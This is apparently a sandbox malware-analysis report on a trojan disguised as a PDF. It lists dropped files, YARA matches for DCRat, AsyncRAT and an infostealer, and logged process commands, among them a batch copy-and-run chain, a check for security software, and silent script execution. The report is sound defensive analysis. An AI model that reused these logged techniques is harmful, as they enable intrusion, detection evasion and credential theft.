Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Shopping entropy: 7.99777589282	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Occasion entropy: 7.99768657255	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Releases entropy: 7.99747629343	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Screenshot entropy: 7.99758477012	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Constitution entropy: 7.99785542758	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\186040\L entropy: 7.9999202002	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	File created: C:\Users\user\AppData\Local\EchoArtisan Technologies\K entropy: 7.9999202002	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: nj230708full.pdf.scr.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 24_2_014D32E8 NtProtectVirtualMemory,	24_2_014D32E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 24_2_014D33AF NtProtectVirtualMemory,	24_2_014D33AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 24_2_014D2E90 NtProtectVirtualMemory,	24_2_014D2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00B432F0 NtProtectVirtualMemory,	36_2_00B432F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00B42E98 NtProtectVirtualMemory,	36_2_00B42E98

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AF4635: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

18_2_00AF4635

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AE1A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

18_2_00AE1A7B

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AEF0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		18_2_00AEF0CD

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Windows\BarryInk	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Windows\SrReduction	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Windows\LunchLeaf	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Windows\WizardHighlighted	Jump to behavior

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA2097	18_2_00AA2097
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA80C7	18_2_00AA80C7
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A821FD	18_2_00A821FD
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00ABA30E	18_2_00ABA30E
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA2352	18_2_00AA2352
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A9C45C	18_2_00A9C45C
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00B0C5C4	18_2_00B0C5C4
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF28D7	18_2_00AF28D7
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00ABE920	18_2_00ABE920
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AE8AB4	18_2_00AE8AB4
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A9CBB2	18_2_00A9CBB2
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AB6B8B	18_2_00AB6B8B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AACEC0	18_2_00AACEC0
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00B14F4F	18_2_00B14F4F
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A8D000	18_2_00A8D000
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AB71F9	18_2_00AB71F9
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A89540	18_2_00A89540
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA17B4	18_2_00AA17B4
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A89A20	18_2_00A89A20
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA1B26	18_2_00AA1B26
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA7C3B	18_2_00AA7C3B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA1DD0	18_2_00AA1DD0
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A89E80	18_2_00A89E80
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA7E6A	18_2_00AA7E6A
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A9DF78	18_2_00A9DF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 24_2_014D2718	24_2_014D2718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 24_2_014D270A	24_2_014D270A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 24_2_014D2E90	24_2_014D2E90
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 31_2_01201CC0	31_2_01201CC0
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 31_2_01202788	31_2_01202788
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 31_2_01205A41	31_2_01205A41
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 33_2_01122788	33_2_01122788
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 33_2_01125A41	33_2_01125A41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00B42720	36_2_00B42720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00B42E98	36_2_00B42E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00B42718	36_2_00B42718
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 43_2_01552788	43_2_01552788
Source: C:\Users\user\AppData\Roaming\winservices.exe	Code function: 43_2_01555A41	43_2_01555A41

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: String function: 00A9FE52 appears 39 times
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: String function: 00AA0E50 appears 46 times
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: String function: 004062A3 appears 58 times

Source: nj230708full.pdf.scr.exe, 00000000.00000003.1754326787.00000000006EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs nj230708full.pdf.scr.exe
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutoIt3.exeP vs nj230708full.pdf.scr.exe
Source: nj230708full.pdf.scr.exe, 00000000.00000002.1755445051.00000000006EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs nj230708full.pdf.scr.exe
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1754042165.00000000006EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs nj230708full.pdf.scr.exe

Source: nj230708full.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: winservices.exe.24.dr, TaskParameter.cs	Task registration methods: 'CreateNewTaskItemFrom'
Source: winservices.exe.24.dr, OutOfProcTaskHostNode.cs	Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
Source: winservices.exe.24.dr, TaskLoader.cs	Task registration methods: 'CreateTask'
Source: winservices.exe.24.dr, RegisteredTaskObjectCacheBase.cs	Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'

Source: winservices.exe.24.dr, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: winservices.exe.24.dr, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: winservices.exe.24.dr, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: winservices.exe.24.dr, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: winservices.exe.24.dr, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: winservices.exe, 0000001F.00000002.2155092816.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\*.sln
Source: winservices.exe, 00000021.00000002.2166970705.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, winservices.exe, 0000002B.00000002.2827663769.00000000015A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Local\Temp\186040\<.sln
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: winservices.exe, 00000021.00000002.2167826566.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000002B.00000002.2828865634.0000000003471000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q.C:\Users\user\AppData\Local\Temp\186040\*.sln
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000002.2155092816.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, winservices.exe, 00000021.00000002.2167826566.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000002B.00000002.2828865634.0000000003471000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: *.sln
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: /ignoreprojectextensions:.sln
Source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@70/48@1/0

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AF40CC GetLastError,FormatMessageW,

18_2_00AF40CC

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AE1939 AdjustTokenPrivileges,CloseHandle,		18_2_00AE1939
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AE1F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		18_2_00AE1F3D

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AEDC3E CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle,

18_2_00AEDC3E

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AF38E0 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

18_2_00AF38E0

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif

File created: C:\Users\user\AppData\Local\EchoArtisan Technologies

Jump to behavior

Source: C:\Users\user\AppData\Roaming\winservices.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\ugggbgoagl
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

File created: C:\Users\user\AppData\Local\Temp\nsm84C.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat""

Source: nj230708full.pdf.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

File read: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nj230708full.pdf.scr.exe "C:\Users\user\Desktop\nj230708full.pdf.scr.exe"
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
